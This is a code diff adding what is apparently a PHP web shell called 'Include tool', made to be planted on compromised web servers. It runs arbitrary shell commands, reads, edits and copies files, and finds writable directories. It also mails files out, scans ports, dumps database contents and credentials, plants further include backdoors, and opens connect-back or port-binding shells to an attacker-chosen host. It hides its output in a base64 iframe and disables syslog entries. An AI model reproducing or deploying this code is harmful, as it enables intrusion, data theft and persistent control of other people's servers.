+	'phpshellhost',
+	'phpshellport'
+);
+
+
+# activate syslog entry
+if($syslog == 1)
+{
+#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
+#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
+}
+###############################################################################
+#
+# start include output 
+#
+###############################################################################
+$strOutput = "";
+$strOutput .= "<html><body bgcolor='#ffffff'>
+<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
+<center>
+<h2>Include tool</h2>
+PHP Version: " . phpversion() . " | 
+safe_mode: $SM |
+register_globals: $RG | 
+magic_quotes_gpc: $MQ | 
+syslogging: ";
+if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
+$strOutput .= "
+<br><br>
+</center>
+<font color='#000000'>";
+foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 
+
+###############################################################################
+# test cmd shell environment
+###############################################################################
+if($env == 1) { 
+	$strOutput .= "
+	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
+	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
+	if($emeth==0) { 
+		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
+	} else {
+		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
+		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
+		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
+		</table>";
+	}
+}
+
+###############################################################################
+# test php environment
+###############################################################################
+if($phpenv == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
+		<tr><td colspan=2>posix infos</td><tr>";
+		if(function_exists('posix_uname')) {
+			$posix_uname = posix_uname();
+			while (list($info, $value) = each ($posix_uname)) {
+				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
+			}
+		} else {
+			$strOutput .= "posix_uname not available";
+		}
+		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
+		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
+		else $strOutput .= "posix_getuid not available";
+		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
+		else $strOutput .= "posix_geteuid not available";
+		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
+		else $strOutput .= "posix_getgid not available";
+	$strOutput .= "</table>";
+}
+
+
+###############################################################################
+# dump variables
+###############################################################################
+if($dumpvars == 1) {
+	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
+	<tr><td>" . dd("GLOBALS") . "</td></tr>
+	</table>";
+}
+###############################################################################
+# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($debugscript == 1) { ?>
+	<table border=1><tr><td><h3>debug script</h3></td></tr>
+	<tr><td>
+	<? ddb("DebugArr"); ?>
+	</td></tr>
+	</table>
+<? }
+###############################################################################
+# copy file
+###############################################################################
+if($filecopy == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
+	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
+	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# edit file
+###############################################################################
+if($fileedit == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
+	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
+	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= show_file($editfile);
+	$strOutput .= "</textarea></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= edit_file($editcontent,$editfile,$edit);
+ 	$strOutput .= "</td></tr>
+	</table>
+	</form>";
+}
+###############################################################################
+# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($cmdln == 1) {
+	$emeth = test_cmd_shell();
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
+	<tr><td colspan=2>";
+	if($emeth < 3) {
+		$strOutput .= "The output of this command will be somewhere on the page!";
+		Mexec($cmdcall, $emeth);
+	} else {
+		$strOutput .= Mexec($cmdcall, $emeth);
+	}
+	$strOutput .= "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# sending mime mail
+###############################################################################
+if($mail == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
+	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
+	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
+	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
+	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
+	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
+	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
+	</form>
+	</table>";
+}
+
+###############################################################################
+# drop mini inc handling
+###############################################################################
+if($dropinc == 1) { 
+	if($loc!="") $miniinc_loc = $loc;
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
+	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# connect C back shell handling
+###############################################################################
+if($connectback == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
+	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+###############################################################################
+# PHP shell handling
+###############################################################################
+if($phpshell == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
+	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+
+###############################################################################
+# snooping
+###############################################################################
+if($snoop == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
+	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show highlited source
+###############################################################################
+if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# service check
+###############################################################################
+if($servicecheck == 1) {
+if($servhost!="") $host = $servhost;
+else $host = "localhost";
+
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
+	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
+	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
+	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+
+	$hosts = explode(" ", $host);
+	$port = explode(" ",$tcpports);
+	$values = count($port);
+	$numhosts = count($hosts);
+	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
+	else if($values > 1) $strOutput .= "Checking $values ports..\n";
+	else $strOutput .= "No ports specified!!\n";
+	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
+	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
+	else $strOutput .= "No hosts specified!!\n";
+	if($numhosts >= 1) {
+		for($hcount=0; $hcount < $numhosts; $hcount++) {
+			$tmphost = $hosts[$hcount];
+			$strOutput .= "\nTesting $tmphost..\n";
+			if(($values == 1 && $port[0] != "") | $values > 1) {
+				for ($cont=0; $cont < $values; $cont++) {
+					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
+					$service = getservbyport($port[$cont],"tcp");
+					@$get = fgets($sock[$cont]);
+					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
+					flush();
+				}
+			}
+		}
+	}
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show phpinfo
+###############################################################################
+if($phpinfo == 1){ 
+	phpinfo();
+}
+######################################################################
+# db stuff
+######################################################################
+if($mysqlaccess == 1) {
+	$strOutput .= "<table border=1>
+	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
+	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
+	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
+	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
+	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
+	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
+	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
+	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
+	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
+	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
+	</table>";
+}
+
+if($incdbhost!="" && $incdbuser!="") {
+	if($incdbvar!="") $dbh = $incdbhost;
+	else $dbH = $incdbhost;
+	$dbu = $incdbuser;
+	$dbp = $incdbpass;
+	if($incdbsql!="") $dbs = $incdbsql;
+	if($incdbname!="") $dbn = $incdbname;
+	if($incdbtable!="") $dbt = $incdbtable;
+	if($incdbfile!="") $dumpfile = $incdbfile;
+}
+
+if(isset($dbh)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$dbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td>" .
+		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
+	} else if(isset($dbs)) {
+		$Gdbsql = $dbs;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
+		} else {
+			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
+		}
+	} else if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+		}
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
+		"</td></tr><tr><td>" .
+		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($dbH)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
+		"</td></tr><tr><td>".
+		display_dbs($dbH, $dbu, $dbp);
+	} else if(isset($dbs)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
+		} else {
+			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
+		}
+	} else if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td> ";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
+		}
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
+		"</td></tr><tr><td>" .
+		display_tables($dbH, $dbu, $dbp, $dbn);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($Odbh)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$Odbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
+		"</td></tr><tr><td>" .
+		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($OdbH)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
+	if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
+		"</td></tr><tr><td> " .
+		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($OdbH, $dbu, $dbp);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+
+$strOutput .= "</font></td></tr></table>";
+$strOutputB64 = chunk_split(base64_encode($strOutput));
+echo "</div></div></div></div></div></div></div></div></div></div>\n";
+echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';
+
+######################################################################
+#
+# functions
+#
+######################################################################
+# make globals avail
+function import_globals()  
+{
+	global $HTTP_SERVER_VARS;
+	global $REMOTE_ADDR;  
+	global $PHP_SELF;
+	global $REQUESTS;
+	global $SCRIPT_FILENAME;
+	global $QUERY_STRING;
+	global $SCRIPT_URI;
+	global $SERVER_NAME;
+	$_igr = ini_get('register_globals');
+	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
+	if (phpversion() <= '4.1.0') {
+		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
+	} else {
+		$REQUESTS = $_REQUEST;
+	}
+	if($_SERVER['PHP_SELF']=="") {
+		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
+		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
+		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
+		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
+		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
+	} else {
+		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
+		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
+		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
+		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
+		$PHP_SELF        = $_SERVER['PHP_SELF'];
+		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
+	}
+}
+
+function dd($v) {
+	global $DebugArr;
+	$rv = "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if(array_search($key, $DebugArr)) {'.
+	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+function ddb($v) {
+	echo "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+######################################################################
+# cmd shell functions
+######################################################################
+# test what cmd is working
+function test_cmd_shell(){
+	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
+	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
+	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
+	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
+	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
+	else $var = 0;
+	return $var;
+}
+# function for executing cmds
+function Mexec($Mcmd, $type) {
+	if($Mcmd != ""){
+		$dspec = array(
+			0 => array("pipe", "r"),
+			1 => array("pipe", "w"),
+			2 => array("pipe", "r")
+		);
+		$output = "";
+		switch($type) {
+			case 5:
+				$output .= "<pre>";
+				$lastline = exec($Mcmd, $arrOutput);
+				foreach($arrOutput as $val) {
+					$output .= $val . "\n";
+				}
+				$output .= "</pre>";
+				break;
+			case 4:
+				$proc = proc_open($Mcmd, $dspec, $pipes);
+				if (is_resource($proc)) {
+					$output .= "<pre>";
+					fclose($pipes[0]);
+					while(!feof($pipes[1])) {
+						$tmp = fgets($pipes[1], 1024);
+						$output .= $tmp;
+					}
+					$output .= "</pre>";
+				}
+				break;
+			case 3;
+				$output .= "<pre>";
+				$output .= `$Mcmd`;
+				$output .= "</pre>";
+				break;
+			case 2;
+				print "<pre>\n";
+				$output = system($Mcmd);
+				print "</pre>\n";
+				break;
+			case 1;
+				print "<pre>\n";
+				$output = passthru($Mcmd);
+				print "</pre>\n";
+				break;
+			case 0;
+			default;
+				$output = "There are no execute functions available!";
+				break;
+		}
+		return $output;
+	}	
+}
+function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
+	$msgerror = "";
+	if($msg == "") $msgerror = "please enter a message";
+	elseif($subject == "") $msgerror = "please enter a subject";
+	else {
+		$stlf = md5(uniqid(time())); 
+		$attach = "";
+		$fp = fopen($attach_source, "rb"); 
+		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
+		$header = "From: $from\n"; 
+		$header .= "MIME-Version: 1.0\n"; 
+		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
+		$header .= "This is a multi-part message in MIME format\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: text/plain\n"; 
+		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
+		$header .= "$msg\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
+		$header .= "Content-Transfer-Encoding: base64\n"; 
+		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
+		$header .= chunk_split(base64_encode($attach)); 
+		$header .= "\n"; 
+		$header .= "--$stlf--"; 
+		mail($to,$subject,"",$header); 
+		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
+	} 
+	return $msgerror;
+}
+
+######################################################################
+# system browsing
+######################################################################
+
+function make_switch($val){
+	global $txt;
+	global $lang;
+	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
+	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
+	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
+	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
+}
+function drop_syslog_warning($msg) {
+	global $syslog;
+#	if($syslog == 1) syslog(LOG_WARNING,$msg);
+}
+
+######################################################################
+# file functions
+######################################################################
+function copy_file($source,$dest) {
+	$dataout = "";
+	if($source == "")  $dataout .= "enter source<br>\n";
+	if($dest != "") {
+		ini_set("user_agent","m0ins downloader");
+		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
+		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "enter destination";
+	}
+}
+function edit_file($cont,$dest,$do) {
+	$dataout = "";
+	global $magic_quotes_gpc;
+	if(file_exists($dest)) {
+		if($do == 1){
+			$fh = fopen($dest, "w");		
+			if(!$fh) {
+				$dataout .= "unable to open <b>$dest</b>.\n";
+			} else {
+#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
+				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
+				$write = fwrite($fh, $cont);
+				fclose($fh);
+			}
+		}
+		$dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "unable to open <b>$dest</b>.\n";
+	}
+	return $dataout;
+}
+function show_file($source) {
+	$dataout = "";
+	if(file_exists($source)) {
+		$fh = fopen($source, "r");
+		if(!$fh) {
+			$dataout .= "unable to open <b>$source</b>.\n";
+		} else {
+			$read = fread($fh, filesize($source));
+			fclose($fh);
+			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
+			$dataout .= $read;
+		}
+	} else {
+		$dataout .= "unable to open <b>$source</b>.\n";
+	}
+	return $dataout;
+}
+function snoopy($chdir){
+	$tmpOut = "";
+	global $is_file,$is_dir,$is_w_dir,$is_w_file;
+	$fh = opendir("$chdir");
+	if($fh!="") {
+		while (false !== ($filename = readdir($fh)) ) {
+			$FN = $chdir."/".$filename;
+			if(@is_file($FN)) $is_file[] = $filename;
+			if(@is_dir($FN))  $is_dir[] = $filename;
+			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
+			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
+		}
+		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
+		$tmpOut .= echo_files($is_file,  "all files");
+		$tmpOut .= echo_files($is_dir,   "only dirs");
+		$tmpOut .= echo_files($is_w_dir, "writable dirs");
+		$tmpOut .= echo_files($is_w_file,"writable files");
+		$tmpOut .= "</tr></table>";
+	} else {
+		$tmpOut .= "Permission denied.";
+	}
+	closedir($fh);
+	return $tmpOut;
+}
+
+function echo_files($arr,$txt){
+	$tmpOutMF = "";
+	global $chdir,$MyLoc,$SREQ;
+	$tmpOutMF .= "<td valign=top>";
+	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
+	if(count($arr) > 0) {
+		foreach($arr as $key => $file) {
+			$FN = $chdir."/".$file;
+			$owner = fileowner($FN);
+			$perms = substr(sprintf("%o",fileperms($FN)),-3);
+			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
+			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
+			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+		}
+	}
+    $tmpOutMF .=  "</td>";
+    return $tmpOutMF;
+}
+function print_globals($v) {
+	global $a;
+	echo "<blockquote>\n";
+	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
+	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
+	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
+	" @print_globals( \$v.\"[\".\$key.\"]\" );".
+	"}}";
+	eval($q);
+	echo "</blockquote>\n";
+}
+######################################################################
+# connect back shell function
+######################################################################
+
+function connect_back($tmp_dir, $compiler, $host, $port) {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
